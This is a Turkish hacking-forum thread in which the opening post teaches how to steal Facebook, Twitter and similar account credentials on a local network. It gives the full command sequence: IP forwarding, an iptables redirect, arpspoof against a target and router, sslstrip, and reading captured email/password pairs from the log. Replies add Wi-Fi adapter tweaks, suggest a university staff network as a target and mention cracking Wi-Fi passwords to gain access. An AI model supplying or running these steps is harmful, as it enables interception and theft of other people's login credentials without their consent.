İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Ağ Dinleme Yöntemi ile Facebook Twitter vb. Hesapları Çalma

Ryloka - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
Altay
Mesajlar:
862
Konular:
104
Teşekkür (Etti):
105
Teşekkür (Aldı):
114
Ticaret:
(0) %
07-06-2018 22:50
#1
Ağ Dinleme Yöntemi ile Facebook Twitter vb. Hesapları Çalma
AMACIMIZ

Arpspoofing saldırısı ile yerel ağdaki hedefin Arp tablosunu üzerimize alarak bütün trafiği dinlemek ve hedefin bilgilerini ele geçirmek

ArpSpoof Nedir

Amacımız bölümünde bahsettiğim ağ dinleme işini yapacağımız dinleme yönetimidir

Sslstrip nedir

Normalde hedefin ağ trafiğini dinlerken https protokolünü kullanan sitelerde kullanıcı adı, şifre gibi bilgilerini göremeyiz. Sslstrip de hedefin girdiği https protokolünü kullanan domainleri http yaparak dinlemeye uygun hale getirir.

Kullanımı

İlk olarak kali linux üzerinden terminali açarak aşağıdaki komutu yazıyoruz
Kod:
echo 1 > /proc/sys/net/ipv4/ip_forward
Bu sayede ip yönlendirmesini sağlamış oluyoruz.


Daha sonra http trafiğinin sslstrip'in dinleme yapmış olduğu porta yönlendirmemiz gerekiyor. Bunun için terminale aşağıdaki kodu yazıyoruz.
Kod:
iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  • iptables = Linux üzerinde gelen firewall
  • -t nat = Nat olarak belirliyoruz
  • -A PREROUTING = Yönlendirme olduğunu belirliyoruz
  • -i eth0 = Ağ kartımızı seçiyoruz
  • -p tcp = Protokolü belirliyoruz
  • --destination-port 80 = Yönlendirilecek portu (hedefi) belirliyoruz
  • -j REDIRECT --to-port = Yönlenecek portu belirliyoruz ( Artık 80 portundan gelen verirler 8080 protuna yönlendirilecek)

Daha sonra hedef ip'den router'a Arp isteği göndereceğiz
Kod:
arpspoof -i eth0 -t hedefip(192.168.129.144) routerip(192.168.129.2)
Parantez içinde verdiğim ipler örnektir

Son olarak sslstrip'i araya sokuyoruz
Kod:
sslstrip -l 8080
Bu komutu girdiğinizde terminalde hedef giriş yaptığında loglar düşmeye başlayacaktir ve son işlemimizi yapma vaktimiz geldi gemek olacaktır


Son olarak log dosyasını okuyarak bilgieri elde etmemiz gerekiyor. Log dosyasını aşağıdaki komutla açabiliriz.
Kod:
cat sslstrip.log
Bu komutu girdiğimizde logların arasında şu tarz bir şey çıkacaktır "email=deneme@gmail.com pass=123456" Buradaki email zaten bilgidğiniz email adresi pass ise şifredir


KONU BU ŞEKİLDEDİR ARKADAŞLAR SORULARINIZI YORUMA YAZARSANIZ BEN VEYA BAŞKASI İLLAKİ CEVAPLAYAN ÇIKACAKTIR...

BİR TEŞEKKÜRÜ ÇOK GÖRMEYİN

HATAMIZ VARSA AFFOLA
---------------------

Gençliği yetiştiriniz. Onlara ilim ve irfanın müspet fikirlerini veriniz. Geleceğin aydınlığına onlarla kavuşacaksınız.
Konu Ryloka tarafından (07-06-2018 23:02 Saat 23:02 ) değiştirilmiştir.
REYNMEN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
127.0.0.1
Mesajlar:
361
Konular:
73
Teşekkür (Etti):
39
Teşekkür (Aldı):
79
Ticaret:
(0) %
07-06-2018 23:13
#2
Eline sağlık. Wireless adaptörü lazım mı?
---------------------
Güvenlikte En Zayıf Halka İnsandır.
Ryloka - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
Altay
Mesajlar:
862
Konular:
104
Teşekkür (Etti):
105
Teşekkür (Aldı):
114
Ticaret:
(0) %
07-06-2018 23:15
#3
Alıntı:
REYNMEN´isimli üyeden Alıntı Mesajı göster
Eline sağlık. Wireless adaptörü lazım mı?
Hayır zaten konuda verdiğim kodlar ile ethernet bağlantısı üzerinden yapılabiliyor eğer wireless adaptör kullanmak isterseniz verdiğim
Kod:
iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
kodundaki eth0 yazan bölümü wlan0 olarak değiştirirseniz adaptör üzerinden kullanabilirsiniz
---------------------

Gençliği yetiştiriniz. Onlara ilim ve irfanın müspet fikirlerini veriniz. Geleceğin aydınlığına onlarla kavuşacaksınız.
REYNMEN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
127.0.0.1
Mesajlar:
361
Konular:
73
Teşekkür (Etti):
39
Teşekkür (Aldı):
79
Ticaret:
(0) %
07-06-2018 23:23
#4
Alıntı:
srdrgzldmrc´isimli üyeden Alıntı Mesajı göster
Hayır zaten konuda verdiğim kodlar ile ethernet bağlantısı üzerinden yapılabiliyor eğer wireless adaptör kullanmak isterseniz verdiğim
Kod:
iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
kodundaki eth0 yazan bölümü wlan0 olarak değiştirirseniz adaptör üzerinden kullanabilirsiniz
o halde hedefin internetin de bulunmamız gerekiyor
---------------------
Güvenlikte En Zayıf Halka İnsandır.
white shade - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2014
Nereden:
Mars
Mesajlar:
1.676
Konular:
418
Teşekkür (Etti):
170
Teşekkür (Aldı):
208
Ticaret:
(0) %
07-06-2018 23:29
#5
Son arastirmalarimda sslstript adlı programı geçersiz kılmak için HSDS adlı bi yöntem geliştirmişler. Denemedim daha ama deneyeceğim
Ryloka - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
Altay
Mesajlar:
862
Konular:
104
Teşekkür (Etti):
105
Teşekkür (Aldı):
114
Ticaret:
(0) %
07-06-2018 23:34
#6
Alıntı:
REYNMEN´isimli üyeden Alıntı Mesajı göster
o halde hedefin internetin de bulunmamız gerekiyor
Evet konunun başında "Amacımız" Bölümünde "Yerel Ağ" olarak belirttim zaten hedefle aynı ağda bulunmanız gerekiyor örneğin erişebileceğiniz bir yerde ise wifi şifresi kırmak için yöntemler bulunmakta ağa sızarak işlemlerinizi yapabilirsiniz

Alıntı:
white shade´isimli üyeden Alıntı Mesajı göster
Son arastirmalarimda sslstript adlı programı geçersiz kılmak için HSDS adlı bi yöntem geliştirmişler. Denemedim daha ama deneyeceğim
Hiç denk gelmedim eğer forumda veya başka bir yerde konuyla alakalı bir makale varsa atarsanız sevinirim
---------------------

Gençliği yetiştiriniz. Onlara ilim ve irfanın müspet fikirlerini veriniz. Geleceğin aydınlığına onlarla kavuşacaksınız.
Stretra - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Konstantin
Mesajlar:
284
Konular:
3
Teşekkür (Etti):
6
Teşekkür (Aldı):
30
Ticaret:
(0) %
08-06-2018 00:14
#7
Alıntı:
REYNMEN´isimli üyeden Alıntı Mesajı göster
o halde hedefin internetin de bulunmamız gerekiyor
Amaç bulunduğun ağ ortamını kali linux üzerinden izlemek yani bir ağda olman lazım. Üniversite personel ağı buna en uygunu ^^
---------------------
Hayat bal tadındadır, Adamı aldatır.
ExpertMurderer1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2018
Nereden:
ABD
Mesajlar:
275
Konular:
94
Teşekkür (Etti):
32
Teşekkür (Aldı):
30
Ticaret:
(0) %
08-06-2018 00:21
#8
router ip kendi ip adresimizmi?
Ryloka - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
Altay
Mesajlar:
862
Konular:
104
Teşekkür (Etti):
105
Teşekkür (Aldı):
114
Ticaret:
(0) %
08-06-2018 01:17
#9
Alıntı:
ExpertMurderer1´isimli üyeden Alıntı Mesajı göster
router ip kendi ip adresimizmi?
Hayır modemin ip adresi
---------------------

Gençliği yetiştiriniz. Onlara ilim ve irfanın müspet fikirlerini veriniz. Geleceğin aydınlığına onlarla kavuşacaksınız.
CryptoCoder - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
İstanbul
Yaş:
21
Mesajlar:
756
Konular:
55
Teşekkür (Etti):
192
Teşekkür (Aldı):
124
Ticaret:
(0) %
08-06-2018 08:04
#10
Eline sağlık.
---------------------
Gerilir zorlu bir yay
Oku fırlatmak için;
Gece gökte doğar ay
Yükselip batmak için.

Hüseyin Nihal Atsız

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı